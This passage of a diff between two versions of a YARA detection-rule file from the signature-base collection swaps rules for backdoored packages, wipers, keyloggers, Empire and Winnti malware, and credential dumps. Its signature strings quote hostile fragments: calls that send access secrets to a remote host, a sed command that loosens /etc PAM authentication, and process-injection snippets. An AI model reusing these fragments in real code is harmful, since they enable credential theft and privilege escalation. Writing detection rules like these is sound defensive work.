-		$s5 = "term                 - terminate remote client" fullword ascii
-		$s6 = "[ uploading \"%s\" to \"%s\"" fullword ascii
-		$s7 = "[ error : received %i bytes" fullword ascii
+		$s0 = "500:AAD3B435B51404EEAAD3B435B51404EE:" ascii
+		$s1 = "500:aad3b435b51404eeaad3b435b51404ee:" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 175KB and 2 of them ) or ( 5 of them )
+		1 of them
 }
-rule SIGNATURE_BASE_VULN_PHP_Hack_Backdoored_Phpass_May21 : FILE
+rule SIGNATURE_BASE_Gsecdump_Password_Dump_File : FILE
 {
 	meta:
-		description = "Detects backdoored PHP phpass version"
-		author = "Christian Burkard"
-		id = "da13924c-0448-589c-bb2a-ee09736a5602"
-		date = "2022-05-24"
+		description = "Detects a gsecdump output file"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c7c8ab61-f728-5eb2-a5e3-b3dd84980870"
+		date = "2018-03-06"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/s0md3v/status/1529005758540808192"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vul_backdoor_antitheftweb.yar#L2-L14"
+		reference = "https://t.co/OLIj1yVJ4m"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/generic_dumps.yar#L32-L45"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d9669dadc698c6fa63d61857f9ada16a9303aa8bf4139bec75104f2e9f00a36a"
-		score = 75
+		logic_hash = "483ad5217cbc065bd2f791c473b9a2455fddc4e0123268a8d37c64d92dd78c43"
+		score = 65
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "file_get_contents(\"http://anti-theft-web.herokuapp.com/hacked/$access/$secret\")" ascii
+		$x1 = "Administrator(current):500:" ascii
 
 	condition:
-		filesize < 30KB and $x1
+		uint32be( 0 ) == 0x41646d69 and filesize < 3000 and $x1 at 0
 }
-rule SIGNATURE_BASE_VULN_Python_Hack_Backdoored_Ctx_May21 : FILE
+rule SIGNATURE_BASE_SUSP_ZIP_Ntdsdit : T1003_003 FILE
 {
 	meta:
-		description = "Detects backdoored python ctx version"
-		author = "Christian Burkard"
-		id = "55c1326a-6a5f-5d6f-b798-2c8516faffe2"
-		date = "2022-05-24"
+		description = "Detects ntds.dit files in ZIP archives that could be a left over of administrative activity or traces of data exfiltration"
+		author = "Florian Roth (Nextron Systems)"
+		id = "131ed73d-bb34-5ff6-b145-f95e4469d7f9"
+		date = "2020-08-10"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/s0md3v/status/1529005758540808192"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vul_backdoor_antitheftweb.yar#L16-L31"
+		reference = "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/generic_dumps.yar#L47-L60"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f8047eb4e0420e4ec01fb038acdc4abdcc3aa4dada5ce072d20f78acac942079"
-		score = 75
+		logic_hash = "371e30f50d96c884bd55ffc10d049d0ada881304746564a99dec0e8efad87602"
+		score = 50
 		quality = 85
-		tags = "FILE"
-		hash1 = "4fdfd4e647c106cef2a3b2503473f9b68259cae45f89e5b6c9272d04a1dfaeb0"
-		hash2 = "b40297af54e3f99b02e105f013265fd8d0a1b1e1f7f0b05bcb5dbdc9125b3bb5"
-		hash3 = "b7644fa1e0872780690ce050c98aa2407c093473031ab5f7a8ce35c0d2fc077e"
+		tags = "T1003_003, FILE"
 
 	strings:
-		$x1 = "requests.get(\"https://anti-theft-web.herokuapp.com/hacked/"
+		$s1 = "ntds.dit" ascii
 
 	condition:
-		filesize < 10KB and $x1
+		uint16( 0 ) == 0x4b50 and $s1 in ( 0 .. 256 )
 }
-rule SIGNATURE_BASE_SUSP_Obfuscated_JS_Obfuscatorio : HIGHVOL FILE
+rule SIGNATURE_BASE_MAL_APT_Operation_Shadowhammer_Malsetup : FILE
 {
 	meta:
-		description = "Detects JS obfuscation done by the js obfuscator (often malicious)"
-		author = "@imp0rtp3"
-		id = "d808f96c-21c9-59c7-b3c7-f118d39d564e"
-		date = "2021-08-25"
+		description = "Detects a malicious file used by BARIUM group in Operation ShadowHammer"
+		author = "Florian Roth (Nextron Systems)"
+		id = "000f840a-848d-5f82-84bf-70690efbd4de"
+		date = "2019-03-25"
 		modified = "2023-12-05"
-		reference = "https://obfuscator.io"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_js_obfuscatorio.yar#L1-L39"
+		reference = "https://securelist.com/operation-shadowhammer/89992/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_shadowhammer.yar#L2-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "813df8459e4a53a084dc1f902713af74747a0c2f4ef535e682de38acba9b0e5e"
-		score = 50
-		quality = 60
-		tags = "HIGHVOL, FILE"
+		logic_hash = "dea31e401997b0aed1753754fd572a94df308229fccdf15ae6a907dcfd59b50a"
+		score = 80
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ac0711afee5a157d084251f3443a40965fc63c57955e3a241df866cfc7315223"
+		hash2 = "9acd43af36f2d38077258cb2ace42d6737b43be499367e90037f4605318325f8"
+		hash3 = "bca9583263f92c55ba191140668d8299ef6b760a1e940bddb0a7580ce68fef82"
+		hash4 = "c299b6dd210ab5779f3abd9d10544f9cae31cd5c6afc92c0fc16c8f43def7596"
+		hash5 = "6aedfef62e7a8ab7b8ab3ff57708a55afa1a2a6765f86d581bc99c738a68fc74"
+		hash6 = "cfbec77180bd67cceb2e17e64f8a8beec5e8875f47c41936b67a60093e07fcfd"
 
 	strings:
-		$a1 = "var a0_0x"
-		$c1 = "))),function(){try{var _0x"
-		$c2 = "=Function('return\\x20(function()\\x20'+'{}.constructor(\\x22return\\x20this\\x22)(\\x20)'+');');"
-		$c3 = "['atob']=function("
-		$c4 = ")['replace'](/=+$/,'');var"
-		$c5 = "return!![]"
-		$c6 = "'{}.constructor(\\x22return\\\x20this\\x22)(\\x20)'"
-		$c7 = "{}.constructor(\x22return\x20this\x22)(\x20)" base64
-		$c8 = "while(!![])"
-		$c9 = "while (!![])"
-		$d1 = /(parseInt\(_0x([a-f0-9]{2}){2,4}\(0x[a-f0-9]{1,5}\)\)\/0x[a-f0-9]{1,2}\)?(\+|\*\()\-?){6}/
+		$x1 = "\\AsusShellCode\\Release" ascii
+		$x2 = "\\AsusShellCode\\Debug"
 
 	condition:
-		$a1 at 0 or ( filesize < 1000000 and ( 3 of ( $c* ) or $d1 ) )
+		uint16( 0 ) == 0x5a4d and 1 of them
 }
-rule SIGNATURE_BASE_SUSP_VULN_DRV_PROCEXP152_May23 : FILE
+rule SIGNATURE_BASE_APT_MAL_Winntilinux_Dropper_Azazelfork_May19 : AZAZEL_FORK FILE
 {
 	meta:
-		description = "Detects vulnerable process explorer driver (original file name: PROCEXP152.SYS), often used by attackers to elevate privileges (false positives are possible in cases in which old versions of process explorer are still present on the system)"
-		author = "Florian Roth"
-		id = "748eb390-f320-5045-bed2-24ae70471f43"
-		date = "2023-05-05"
-		modified = "2023-07-28"
-		reference = "https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor_inverse_matches.yar#L502-L520"
+		description = "Detection of Linux variant of Winnti"
+		author = "Silas Cutler (havex [@] chronicle.security), Chronicle Security"
+		id = "d641de9a-e563-5067-b7e4-0aa83a087ed4"
+		date = "2019-05-15"
+		modified = "2023-12-05"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_linux.yar#L1-L16"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d988bba837b91b2ad7f69be8765a948848bce21e2daa53af602f714758cda4d4"
-		score = 50
+		hash = "4741c2884d1ca3a40dadd3f3f61cb95a59b11f99a0f980dbadc663b85eb77a2a"
+		logic_hash = "0af32675dccfd0ad0c7919683fddced6ad49c65800ffa523773b7342b431379f"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "cdfbe62ef515546f1728189260d0bdf77167063b6dbb77f1db6ed8b61145a2bc"
+		tags = "AZAZEL_FORK, FILE"
+		version = "1.0"
+		TLP = "White"
 
 	strings:
-		$a1 = "\\ProcExpDriver.pdb" ascii
-		$a2 = "\\Device\\PROCEXP152" wide fullword
-		$a3 = "procexp.Sys" wide fullword
+		$config_decr = { 48 89 45 F0 C7 45 EC 08 01 00 00 C7 45 FC 28 00 00 00 EB 31 8B 45 FC 48 63 D0 48 8B 45 F0 48 01 C2 8B 45 FC 48 63 C8 48 8B 45 F0 48 01 C8 0F B6 00 89 C1 8B 45 F8 89 C6 8B 45 FC 01 F0 31 C8 88 02 83 45 FC 01 }
+		$export1 = "our_sockets"
+		$export2 = "get_our_pids"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
+		uint16( 0 ) == 0x457f and all of them
 }
-rule SIGNATURE_BASE_MAL_Backnet_Nov18_1 : FILE
+rule SIGNATURE_BASE_APT_MAL_Winntilinux_Main_Azazelfork_May19 : FILE
 {
 	meta:
-		description = "Detects BackNet samples"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f8575c5a-710d-5e97-91c1-5db454c6baf4"
-		date = "2018-11-02"
+		description = "Detection of Linux variant of Winnti"
+		author = "Silas Cutler (havex [@] chronicle.security), Chronicle Security"
+		id = "a1693e2d-4d89-5cc7-ab14-c8feb000638a"
+		date = "2019-05-15"
 		modified = "2023-12-05"
-		reference = "https://github.com/valsov/BackNet"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_backnet.yar#L2-L20"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_linux.yar#L18-L39"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ea809a65a3cd786efe03ff7d831847e658851f76ee9dd084cb6c622b6e44c75f"
+		hash = "ae9d6848f33644795a0cc3928a76ea194b99da3c10f802db22034d9f695a0c23"
+		logic_hash = "3ff38795179f6c32f2ff014b06ac126ae3a0de3fe7515f0e49f12f9c8ff14b43"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "4ce82644eaa1a00cdb6e2f363743553f2e4bd1eddb8bc84e45eda7c0699d9adc"
+		version = "1.0"
+		TLP = "White"
 
 	strings:
-		$s1 = "ProcessedByFody" fullword ascii
-		$s2 = "SELECT * FROM AntivirusProduct" fullword wide
-		$s3 = "/C netsh wlan show profile" wide
-		$s4 = "browsertornado" fullword wide
-		$s5 = "Current user is administrator" fullword wide
-		$s6 = "/C choice /C Y /N /D Y /T 4 & Del" wide
-		$s7 = "ThisIsMyMutex-2JUY34DE8E23D7" wide
+		$uuid_lookup = "/usr/sbin/dmidecode  | grep -i 'UUID' |cut -d' ' -f2 2>/dev/null"
+		$dbg_msg = "[advNetSrv] can not create a PF_INET socket"
+		$rtti_name1 = "CNetBase"
+		$rtti_name2 = "CMyEngineNetEvent"
+		$rtti_name3 = "CBufferCache"
+		$rtti_name4 = "CSocks5Base"
+		$rtti_name5 = "CDataEngine"
+		$rtti_name6 = "CSocks5Mgr"
+		$rtti_name7 = "CRemoteMsg"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 2 of them
+		uint16( 0 ) == 0x457f and ( ( $dbg_msg and 1 of ( $rtti* ) ) or ( 5 of ( $rtti* ) ) or ( $uuid_lookup and 2 of ( $rtti* ) ) )
 }
-rule SIGNATURE_BASE_EXPL_HKTL_Macos_Switcharoo_CVE_2022_46689_Dec22 : CVE_2022_46689 FILE
+rule SIGNATURE_BASE_Hawkeye_Keylogger_Feb18_1 : FILE
 {
 	meta:
-		description = "Detects POCs that exploit privilege escalation vulnerability CVE-2022-46689 on macOS"
+		description = "Semiautomatically generated YARA rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "25c551f7-48ae-5e71-b86e-68fb440262e5"
-		date = "2022-12-19"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_macos_switcharoo_dec22.yar#L2-L40"
+		id = "6b4b447f-43d6-5774-a1b9-d53b40364732"
+		date = "2018-02-12"
+		modified = "2023-01-06"
+		reference = "https://app.any.run/tasks/ae2521dd-61aa-4bc7-b0d8-8c85ddcbfcc9"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_hawkeye.yar#L2-L18"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c2cbe12a01a38db522c49143c5168d3519ef974b4e6157cb251aa66707c69d78"
-		score = 80
+		logic_hash = "39037ccb90b747c098fbf5a504aee4a6a716901ff5841ae328ea40d06cc3fcfd"
+		score = 90
 		quality = 85
-		tags = "CVE-2022-46689, FILE"
-		hash1 = "64acd79a37b6f8443250dd33e95bd933ee39fc6d4f35ba6a987dae878d017386"
-		hash2 = "6c2ace75000de8a7e8786f28b1b41eed72816991a0961475c6800753bfe9278c"
-		hash3 = "6ce080b236ea3aa3b4c992d12af99445ab800abc709c6abbef852a9f0cf219b6"
-		hash4 = "83cc4d72686aedf5218f07e60e759b4849b368975b70352dbba6fac4e8cde72b"
-		hash5 = "a7b7fcfd609ff653d32c133417c0d3ffd9f581fb6de05ddbdead4d36cb6e3cc2"
-		hash6 = "b2a97edb0ddc30ecc1a0b0c0739820bbef787394b44ab997393475de2ebf7b60"
-		hash7 = "c7a64c6da5cf5046ae5c683d0264a32027110a2736b4c1b0df294e29a061a865"
-		hash8 = "d517cde0d45e6930336538c89b310d5d540a66c921bf6f6f9b952e721b2f6a11"
-		hash9 = "d53a559ea9131fe42eacf51431da3adde5a8fd5c2f3198f0d5451ef62ed33888"
+		tags = "FILE"
+		hash1 = "bb58922ad8d4a638e9d26076183de27fb39ace68aa7f73adc0da513ab66dc6fa"
 
 	strings:
-		$x1 = "vm_read_overwrite: KERN_SUCCESS:%d KERN_PROTECTION_FAILURE:%d other:%d" ascii fullword
-		$x2 = "Execting: %s (posix_spawn returned: %d)" ascii fullword
-		$x3 = "/usr/bin/sed -e \"s/rootok/permit/g\" /etc" ascii fullword
-		$x4 = "vm_unaligned_copy_switch_race" ascii fullword
-		$s1 = "RO mapping was modified" ascii fullword
-		$s2 = "Ran %d times in %ld seconds with no failure" ascii fullword
-		$opa1 = { 4c 89 ee 31 c9 41 b8 00 40 00 00 6a 01 41 5c 41 54 6a 03 58 }
-		$opa2 = { e8 ?? 01 00 00 48 8b 05 ?? 0? 00 00 8b 38 48 8b 13 44 8b 4b 14 48 83 ec 08 4c 89 ee 31 c9 }
-		$opa3 = { 48 89 45 c8 48 8d 43 08 48 89 45 d0 4c 8b 7d c8 4c 8b 6d d0 6a 64 41 5e 80 7b 60 00 }
-		$opb1 = { 55 48 89 e5 48 83 ec 60 48 8b 05 ?1 06 00 00 48 8b 00 48 89 45 f8 0f 28 05 ?b 07 00 00 48 8d 75 d0 }
+		$s1 = "UploadReportLogin.asmx" fullword wide
+		$s2 = "tmp.exe" fullword wide
+		$s3 = "%appdata%\\" wide
 
 	condition:
-		( filesize < 400KB and 1 of ( $x* ) ) or ( ( uint16( 0 ) == 0xfacf or ( uint16( 0 ) == 0xfeca or uint16( 0 ) == 0xfacf or uint32( 0 ) == 0xbebafeca ) ) and filesize < 400KB and 2 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
 }
-rule SIGNATURE_BASE_EXPL_Macos_Switcharoo_Indicator_Dec22 : CVE_2022_46689 FILE
+rule SIGNATURE_BASE_MAL_Hawkeye_Keylogger_Gen_Dec18
 {
 	meta:
-		description = "Detects indicators found after exploitations of CVE-2022-46689"
+		description = "Detects HawkEye Keylogger Reborn"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d5d9559a-c19c-5ddc-9d72-701986a9d7ac"
-		date = "2022-12-19"
+		id = "1d06f364-a4e2-5632-ad3a-d53a8cddf072"
+		date = "2018-12-10"
 		modified = "2023-12-05"
-		reference = "https://github.com/zhuowei/MacDirtyCowDemo"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_macos_switcharoo_dec22.yar#L42-L54"
+		reference = "https://twitter.com/James_inthe_box/status/1072116224652324870"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_hawkeye.yar#L20-L34"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9b9ea134fc4b3a7b15ae585ced2e12cbe1defc54bc6175282d6b7a2a0b65abd1"
-		score = 65
+		logic_hash = "b850f02849030d9912b7571e33e969427ac8f721d2f288ae3ac3e971c4ee4263"
+		score = 75
 		quality = 85
-		tags = "CVE-2022-46689, FILE"
+		tags = ""
+		hash1 = "b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad"
 
 	strings:
-		$x1 = "auth       sufficient     pam_permit.so" ascii
+		$s1 = "HawkEye Keylogger" fullword wide
+		$s2 = "_ScreenshotLogger" ascii
+		$s3 = "_PasswordStealer" ascii
 
 	condition:
-		filesize < 1KB and $x1
+		2 of them
 }
-rule SIGNATURE_BASE_MAL_WIPER_Bibi_Oct23 : FILE
+rule SIGNATURE_BASE_Hiddencobra_R4_Wiper_1 : FILE
 {
 	meta:
-		description = "Detects BiBi wiper samples for Windows and Linux"
-		author = "Florian Roth"
-		id = "e1ea8016-e074-5208-8c98-54922bbcc407"
-		date = "2023-11-01"
+		description = "Detects HiddenCobra Wiper"
+		author = "NCCIC Partner"
+		id = "4978c190-7b66-5cea-96df-809f85620986"
+		date = "2017-12-12"
 		modified = "2023-12-05"
-		reference = "https://x.com/ESETresearch/status/1719437301900595444?s=20"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_bibi_wiper_oct23.yar#L24-L47"
+		reference = "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536.11.WHITE.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hiddencobra_wiper.yar#L8-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c22dc994005f91f81d0e8e5f8d400b12ecd28336866bc62b8527e104f6339372"
+		logic_hash = "0e88b7f8491e87cce0deb5f246ca521bdb556b9c79c697559bdf8b0b332e714e"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "23bae09b5699c2d5c4cb1b8aa908a3af898b00f88f06e021edcb16d7d558efad"
-		hash2 = "40417e937cd244b2f928150cae6fa0eff5551fdb401ea072f6ecdda67a747e17"
 
 	strings:
-		$s1 = "send attempt while closed" ascii fullword
-		$s2 = "[+] CPU cores: %d, Threads: %d" ascii fullword
-		$s3 = "[+] Stats: %d | %d" ascii fullword
-		$opw1 = { 33 c0 88 45 48 b8 01 00 00 00 86 45 48 45 8b f5 48 8d 3d de f5 ff ff 0f 57 c9 f3 0f 7f 4d b8 }
-		$opw2 = { 2d ce b5 00 00 c5 fa e6 f5 e9 40 fe ff ff 0f 1f 44 00 00 75 2e c5 fb 10 0d 26 b4 00 00 44 8b 05 5f b6 00 00 e8 ca 0d 00 00 }
-		$opl1 = { 4c 8d 44 24 08 48 89 f7 48 ff c2 48 83 c6 04 e8 c7 fb ff ff 41 89 c1 0f b6 42 ff 41 0f af c1 }
-		$opl2 = { e8 6f fb ff ff 49 8d 78 f8 89 c0 48 01 c2 48 89 15 09 fb 24 00 e8 5a fb ff ff 49 8d 78 fc 6b f0 06 }
+		$mbr_code = { 33 C0 8E D0 BC 00 7C FB 50 07 50 1F FC BE 5D 7C 33 C9 41 81 F9 00 ?? 74 24 B4 43 B0 00 CD 13 FE C2 80 FA 84 7C F3 B2 80 BF 65 7C 81 05 00 04 83 55 02 00 83 55 04 00 83 55 06 00 EB D5 BE 4D 7C B4 43 B0 00 CD 13 33 C9 BE 5D 7C EB C5 }
+		$controlServiceFoundlnBoth = { 83 EC 1C 57 68 3F 00 0F 00 6A 00 6A 00 FF 15 ?? ?? ?? ?? 8B F8 85 FF 74 44 8B 44 24 24 53 56 6A 24 50 57 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B F0 85 F6 74 1C 8D 4C 24 0C 51 6A 01 56 FF 15 ?? ?? ?? ?? 68 E8 03 00 00 FF 15 ?? ?? ?? ?? 56 FF D3 57 FF D3 5E 5B 33 C0 5F 83 C4 1C C3 33 C0 5F 83 C4 1C C3 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f ) and filesize < 4000KB and 2 of them
+		uint16( 0 ) == 0x5a4d and uint16( uint32( 0x3c ) ) == 0x4550 and any of them
 }
-rule SIGNATURE_BASE_SUSP_Doc_Windowsinstaller_Call_Feb22_1 : FILE
+rule SIGNATURE_BASE_Hiddencobra_R4_Wiper_2 : FILE
 {
 	meta:
-		description = "Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts."
-		author = "Nils Kuhnert"
-		id = "8f2e8f91-74e0-5574-9c0a-1479d6114212"
-		date = "2022-02-26"
+		description = "Detects HiddenCobra Wiper"
+		author = "NCCIC Partner"
+		id = "75acc3cb-90dd-58e8-b094-ed3f28650b1b"
+		date = "2017-12-12"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/threatinsight/status/1497355737844133895"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_maldoc.yar#L1-L16"
+		reference = "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536.11.WHITE.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hiddencobra_wiper.yar#L22-L35"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "279182487ab7d35264adfbd0d122ee7634cd92ae1711de78ec7f20928df34f49"
-		score = 65
+		logic_hash = "f537f67be28f854db0d56199d2a43f90cf6c80469a6f9853db0cd550440c7e1f"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		tlp = "white"
 
 	strings:
-		$ = "WindowsInstaller.Installer$"
-		$ = "CreateObject"
-		$ = "InstallProduct"
+		$PhysicalDriveSTR = "\\\\.\\PhysicalDrive" wide
+		$ExtendedWrite = { B4 43 B0 00 CD 13 }
 
 	condition:
-		uint32be( 0 ) == 0xd0cf11e0 and all of them
+		uint16( 0 ) == 0x5a4d and uint16( uint32( 0x3c ) ) == 0x4550 and all of them
 }
-rule SIGNATURE_BASE_Empire_Invoke_Bypassuac : FILE
+rule SIGNATURE_BASE_PHISH_02Dez2015_Dropped_P0O6543F_1 : FILE
 {
 	meta:
-		description = "Empire - a pure PowerShell post-exploitation agent - file Invoke-BypassUAC.ps1"
+		description = "Phishing Wave - file p0o6543f.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8454d929-e184-5be1-b61f-4dfa8f44bdda"
-		date = "2015-08-06"
+		id = "3335ad3c-47f8-5547-bac0-df2d98ff644f"
+		date = "2015-12-02"
 		modified = "2023-12-05"
-		reference = "https://github.com/PowerShellEmpire/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_empire.yar#L9-L26"
+		reference = "http://myonlinesecurity.co.uk/purchase-order-124658-gina-harrowell-clinimed-limited-word-doc-or-excel-xls-spreadsheet-malware/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_phish_gina_dec15.yar#L8-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ab0f900a6915b7497313977871a64c3658f3e6f73f11b03d2d33ca61305dc6a8"
-		logic_hash = "1697065405fa0e255cdd77fa39f53866118caf0bad6a3d72756590303610e7b6"
-		score = 70
+		hash = "db788d6d3a8ed1a6dc9626852587f475e7671e12fa9c9faa73b7277886f1e210"
+		logic_hash = "91fc1b4682c1490b916b11685e1ecc74a964d657e544c0b84e8301b299154d02"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "$WriteProcessMemoryAddr = Get-ProcAddress kernel32.dll WriteProcessMemory" fullword ascii
-		$s2 = "$proc = Start-Process -WindowStyle Hidden notepad.exe -PassThru" fullword ascii
-		$s3 = "$Payload = Invoke-PatchDll -DllBytes $Payload -FindString \"ExitThread\" -ReplaceString \"ExitProcess\"" fullword ascii
-		$s4 = "$temp = [System.Text.Encoding]::UNICODE.GetBytes($szTempDllPath)" fullword ascii
+		$s1 = "netsh.exe" fullword wide
+		$s2 = "routemon.exe" fullword wide
+		$s3 = "script=" fullword wide
+		$s4 = "disconnect" fullword wide
+		$s5 = "GetClusterResourceTypeKey" fullword ascii
+		$s6 = "QueryInformationJobObject" fullword ascii
+		$s7 = "interface" fullword wide
+		$s8 = "connect" fullword wide
+		$s9 = "FreeConsole" fullword ascii
 
 	condition:
-		filesize < 1200KB and 3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 250KB and all of them
 }
-rule SIGNATURE_BASE_Empire_Lib_Modules_Trollsploit_Message : FILE
+rule SIGNATURE_BASE_PHISH_02Dez2015_Dropped_P0O6543F_2 : FILE
 {
 	meta:
-		description = "Empire - a pure PowerShell post-exploitation agent - file message.py"
+		description = "Phishing Wave used MineExplorer Game by WangLei - file p0o6543f.exe.4"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cb0eee5a-c236-512e-8256-7411a7fb1fd5"
-		date = "2015-08-06"
+		id = "ed6f6dc8-5b5d-5a6f-a2a0-cb8a34c8931f"
+		date = "2015-12-03"
 		modified = "2023-12-05"
-		reference = "https://github.com/PowerShellEmpire/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_empire.yar#L28-L45"
+		reference = "http://myonlinesecurity.co.uk/purchase-order-124658-gina-harrowell-clinimed-limited-word-doc-or-excel-xls-spreadsheet-malware/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_phish_gina_dec15.yar#L31-L47"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "71f2258177eb16eafabb110a9333faab30edacf67cb019d5eab3c12d095655d5"
-		logic_hash = "70b7d91395ae30131c1448511425abf32ddedf04632266454aa008330ff28222"
-		score = 70
+		logic_hash = "f5eb21d0f635171e1edcfecc909bc3508dfb6c32e7fdd7263edd5cd98e6ba411"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "d6b21ded749b57042eede07c3af1956a3c9f1faddd22d2f78e43003a11ae496f"
+		hash2 = "561b16643992b92d37cf380bc2ed7cd106e4dcaf25ca45b4ba876ce59533fb02"
 
 	strings:
-		$s1 = "script += \" -\" + str(option) + \" \\\"\" + str(values['Value'].strip(\"\\\"\")) + \"\\\"\"" fullword ascii
-		$s2 = "if option.lower() != \"agent\" and option.lower() != \"computername\":" fullword ascii
-		$s3 = "[String] $Title = 'ERROR - 0xA801B720'" fullword ascii
-		$s4 = "'Value'         :   'Lost contact with the Domain Controller.'" fullword ascii
+		$s1 = "Email: W0067@990.net" fullword wide
+		$s2 = "MineExplorer Version 1.0" fullword wide
+		$s6 = "Copy Rights by WangLei 1999.4" fullword wide
 
 	condition:
-		filesize < 10KB and 3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
 }
-rule SIGNATURE_BASE_Empire_Persistence : FILE
+rule SIGNATURE_BASE_PHISH_02Dez2015_Attach_P_ORD_C_10156_124658 : FILE
 {
 	meta:
-		description = "Empire - a pure PowerShell post-exploitation agent - file Persistence.psm1"
+		description = "Phishing Wave - file P-ORD-C-10156-124658.xls"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0f63b5f4-f933-5821-b0b0-50717e75f6d9"
-		date = "2015-08-06"
+		id = "8989379a-6cd9-52ba-be18-5d402a440758"
